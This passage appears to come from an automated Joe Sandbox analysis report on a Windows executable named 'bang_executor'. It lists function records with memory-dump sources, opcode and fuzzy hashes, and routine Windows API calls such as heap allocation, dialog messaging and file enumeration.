                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: BitmapCreateFromGdipStream
                                        • String ID:
                                        • API String ID: 1918208029-0
                                        • Opcode ID: 479d67353646ee67fdf701365dcd4d5fab56966fb4919ae7c956878f0bebe1a5
                                        • Instruction ID: bbda99cf22f8dd8de5a4cee79de70635e2d844f664e9193459d801a80df0592d
                                        • Opcode Fuzzy Hash: 479d67353646ee67fdf701365dcd4d5fab56966fb4919ae7c956878f0bebe1a5
                                        • Instruction Fuzzy Hash: 80E06D7180460CEBCB10DF99C544BAEBBF8EF05350F10C01BE98693200D274AE449B55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005051CA
                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 005051D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                        • String ID:
                                        • API String ID: 1660781231-0
                                        • Opcode ID: 413b4ef27ff43fd7a6fdd8e0db7986649c031156559bb4a0bca23231608c9563
                                        • Instruction ID: 176cf14be66d3cf3978126e40c3901b3db2524feab013db323d4f25205758fc0
                                        • Opcode Fuzzy Hash: 413b4ef27ff43fd7a6fdd8e0db7986649c031156559bb4a0bca23231608c9563
                                        • Instruction Fuzzy Hash: FAD0A978948F0368CC2026B0282B79F2F40BF927B47B01A46E4618A4C2FA128845EE62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ItemShowWindow
                                        • String ID:
                                        • API String ID: 3351165006-0
                                        • Opcode ID: 3c30b0e5d287879a3a1d8ad0e897fc5784edb573aec76d67aef8b990cd9d1940
                                        • Instruction ID: 70b910e6a57d83adf16be9ec0685ecc9e4837c3b62d78057cee90a4b392b590e
                                        • Opcode Fuzzy Hash: 3c30b0e5d287879a3a1d8ad0e897fc5784edb573aec76d67aef8b990cd9d1940
                                        • Instruction Fuzzy Hash: C4C0123A05C208BECB010BB0DC09C6ABBA8ABAA216F11CA48F0A6C1060C339C014EB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 004E1331
                                        • KiUserCallbackDispatcher.NTDLL(00000000), ref: 004E1338
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherItemUser
                                        • String ID:
                                        • API String ID: 4250310104-0
                                        • Opcode ID: 9f5e6dbc8216a57d948de1d0fcb915d6a8c542e9b21cb4bdec980ec23809f8c7
                                        • Instruction ID: d0cdb441aaf675ff4852d3f89ed7e8e7a1878e06233b104937c688d886a744cd
                                        • Opcode Fuzzy Hash: 9f5e6dbc8216a57d948de1d0fcb915d6a8c542e9b21cb4bdec980ec23809f8c7
                                        • Instruction Fuzzy Hash: A9C04C7A40C244BFCB015BB09D0CC6FBFB9ABA9315F50D989B5A581020C7358414EB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: ed9ca02b811dfc6ea3c9089f8d33454416d205b2ac3955cb16e6629b939060b7
                                        • Instruction ID: f7fba318beecd8a558b245e5d15d334523789a8d47841393e9f9d8d85efd2ec2
                                        • Opcode Fuzzy Hash: ed9ca02b811dfc6ea3c9089f8d33454416d205b2ac3955cb16e6629b939060b7
                                        • Instruction Fuzzy Hash: FEC1B834A402909BDF15DF2AC884BAE7BA1AF59311F1801BBEC06DB3A6C7789944CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 004E1483
                                          • Part of subcall function 004E6AE8: __EH_prolog3.LIBCMT ref: 004E6AEF
                                          • Part of subcall function 004EEE0F: __EH_prolog3.LIBCMT ref: 004EEE16
                                          • Part of subcall function 004E668F: __EH_prolog3.LIBCMT ref: 004E6696
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 29cfeb1bee1485a3a78f72bce3bd3269d86ec55be8438ed391b27c235b6d1664
                                        • Instruction ID: 62cab097b1a1f44c78a28d5e6e3192ea3bf19ebe321c322f208853d5b6692370
                                        • Opcode Fuzzy Hash: 29cfeb1bee1485a3a78f72bce3bd3269d86ec55be8438ed391b27c235b6d1664
                                        • Instruction Fuzzy Hash: 704104B1A063808ECB14DF6A94802D97BE2BF59300F0801BEEC5DCF29AD7755255CB66
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: d742788036b85e132c7010c0d0b94c7033ff1153321939404c98093a15878a92
                                        • Instruction ID: 54dbf378f791e6f6372298ddf4b09935078846bc9d46243ddd3d0a23e564b575
                                        • Opcode Fuzzy Hash: d742788036b85e132c7010c0d0b94c7033ff1153321939404c98093a15878a92
                                        • Instruction Fuzzy Hash: 032127B1E40A169BDB14AFB48C4962F7AE8BB45304F04013BEB15EB2C1E7749800879D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0050D348
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID:
                                        • API String ID: 190572456-0
                                        • Opcode ID: 3b1b970ab51681246e0e315550180b6e54858fc7893e6cbe6164e8ac51b909de
                                        • Instruction ID: cd29b1b12a9d78a22aa6ac10fc962a38ed81023791eb2670fe727d334fcceaa2
                                        • Opcode Fuzzy Hash: 3b1b970ab51681246e0e315550180b6e54858fc7893e6cbe6164e8ac51b909de
                                        • Instruction Fuzzy Hash: 24110D376006259BDB319F6CEC409DE77B5FF8536071A4A20FD15AB1D4D630DC0196E2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: bb6218d27aab3b5bc60f9a33e71714af6707efbf54a746c3110aa0ca5e4777a6
                                        • Instruction ID: 099cb7a574e596d138d27df72afa9b5e9c2601ee357ad4f2541d9b16095b340e
                                        • Opcode Fuzzy Hash: bb6218d27aab3b5bc60f9a33e71714af6707efbf54a746c3110aa0ca5e4777a6
                                        • Instruction Fuzzy Hash: C601C83AD005AA5BCF11EE66C8929EFB772BF44705B11411EFE1167381C739AC10869A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 004E6696
                                          • Part of subcall function 004F11A5: __EH_prolog3.LIBCMT ref: 004F11AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: cf2ccfbd7e2563a7ead07ca1e4534523bd3905ddb66f5f6d8000d93c3fa5ef68
                                        • Instruction ID: b3877392a1de0d85be0cb890ceb2dd79a8015c226ecd0381dc3cff85f0acb6ac
                                        • Opcode Fuzzy Hash: cf2ccfbd7e2563a7ead07ca1e4534523bd3905ddb66f5f6d8000d93c3fa5ef68
                                        • Instruction Fuzzy Hash: B1012174805748CAE715FBB682566EDFBE46F64304F10054FA56A43292CBF82704C76A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00506A24,?,0000015D,?,?,?,?,00507F00,000000FF,00000000,?,?), ref: 0050BCC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 85a5c1656b697a50c9915b752ce90db643311f8cb20e7786f51baf372cce7849
                                        • Instruction ID: 438f97742d079a08998cbcb4e07284ab543a7f4cd5595342d0211d0f326476bb
                                        • Opcode Fuzzy Hash: 85a5c1656b697a50c9915b752ce90db643311f8cb20e7786f51baf372cce7849
                                        • Instruction Fuzzy Hash: F5E06D3920162396FB2127659D85B9F3E58FFA23A4F150121EC0AA62D2CF65CC0182E5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,004EAF75,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?,?), ref: 004EAFEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: 76137c8aeb19f4c6e1fd5c19ee24f8924dfe9522caca1fc80ef19fb6739691dc
                                        • Instruction ID: 525cdc4329e30c62a223b4a66e72972051ffb5568d489c22a21224602fa5c66f
                                        • Opcode Fuzzy Hash: 76137c8aeb19f4c6e1fd5c19ee24f8924dfe9522caca1fc80ef19fb6739691dc
                                        • Instruction Fuzzy Hash: 47F0B471081B428EDB308B22C458793B7E4AB12326F041B1FC0E3426E0D364B58D9641
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004EC4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000), ref: 004EC4E6
                                          • Part of subcall function 004EC4A8: FindFirstFileW.KERNEL32(?,00000000,?,?,00000800,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?), ref: 004EC516
                                          • Part of subcall function 004EC4A8: GetLastError.KERNEL32(?,?,00000800,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000,0000003A), ref: 004EC522
                                        • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,004E87BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 004EC3A5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Find$FileFirst$CloseErrorLast
                                        • String ID:
                                        • API String ID: 1464966427-0
                                        • Opcode ID: 7b44f3d950ed77ab2d34053ce6bed32b787dc4263a116e5cfb94fd1830785a74
                                        • Instruction ID: 47b956723ac8d3c764d6064032a7310a36f58da1c214e8b0452bd96e9fc3e80b
                                        • Opcode Fuzzy Hash: 7b44f3d950ed77ab2d34053ce6bed32b787dc4263a116e5cfb94fd1830785a74
                                        • Instruction Fuzzy Hash: 8CF0B4350093C0AACA2217B65804BC77F915F25337F00CA0EF5FD52192C2A810959766
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 004F2F19
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ExecutionStateThread
                                        • String ID:
                                        • API String ID: 2211380416-0
                                        • Opcode ID: afc68c39b06865ca2f9f2377ed26bc1d927e2633753e2d03144c429c670efbf6
                                        • Instruction ID: bfc5524483ef766db9349483da2e0e539bf7ff65b4a1512c4faf0abbef6591ed
                                        • Opcode Fuzzy Hash: afc68c39b06865ca2f9f2377ed26bc1d927e2633753e2d03144c429c670efbf6
                                        • Instruction Fuzzy Hash: 71D0571161515555D51537277C097FD36565FC731BF04005B7249771C3875D0C4661F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GdipAlloc.GDIPLUS(00000010), ref: 004FC5BC
                                          • Part of subcall function 004FC34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004FC36E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 1915507550-0
                                        • Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                        • Instruction ID: ef9fbee158df01cb64d61d7da793a9dbc3b019871e248c86f97421b40ee6cf2e
                                        • Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
                                        • Instruction Fuzzy Hash: 42D0A73020420DB7DF012B61CD0297F79D5EB00380F00C0267E41C5180EDB5DA106956
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 005001A4
                                          • Part of subcall function 004FD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004FD875
                                          • Part of subcall function 004FD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FD886
                                          • Part of subcall function 004FD864: IsDialogMessageW.USER32(0001045C,?), ref: 004FD89A
                                          • Part of subcall function 004FD864: TranslateMessage.USER32(?), ref: 004FD8A8
                                          • Part of subcall function 004FD864: DispatchMessageW.USER32(?), ref: 004FD8B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                        • String ID:
                                        • API String ID: 897784432-0
                                        • Opcode ID: e4a1b5baf3bcfd7c992eb49bba40eb85387f9edef5fea110a3f48187d657106d
                                        • Instruction ID: c3dc60a8c9abdb87ba724a8317fbfd8086620073cba6ec8e1f5637b2a63828de
                                        • Opcode Fuzzy Hash: e4a1b5baf3bcfd7c992eb49bba40eb85387f9edef5fea110a3f48187d657106d
                                        • Instruction Fuzzy Hash: 67D09E35148304AADA112B52CE06F1E7AA2BB99B09F004559B388350F186629E25AB5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • DloadProtectSection.DELAYIMP ref: 00500AC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
